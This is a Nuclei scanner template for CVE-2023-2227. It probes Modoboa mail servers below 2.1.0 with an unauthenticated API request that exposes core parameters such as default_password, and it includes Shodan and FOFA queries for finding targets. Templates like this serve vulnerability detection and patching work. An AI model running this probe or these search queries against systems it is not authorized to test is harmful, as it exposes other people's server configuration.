nuclei-templates/http/cves/2023/CVE-2023-2227.yaml

id: CVE-2023-2227

info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.    
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-2227
    cwe-id: CWE-285
    cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
  metadata:
    vendor: modoboa
    product: modoboa
    fofa-query: body="Modoboa"
    shodan-query: http.favicon.hash:1949005079
  tags: cve,cve2023,modoboa,exposure,disclosure

http:
  - raw:
      - |
        GET /api/v2/parameters/core/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 7h3h4ckv157        

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'label":'
          - 'default_password":'
          - 'authentication_type":"local'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402204ab95cad35e5dc938efd7d6b61c067c225b1b5db05ba420a90b83c3e944f7e43022044d08dd4379dc38acdb9b5a5aeb2cffcd30d0a608aea1c9e622135c2f087db39:922c64590222798bb761d5b6d8e72950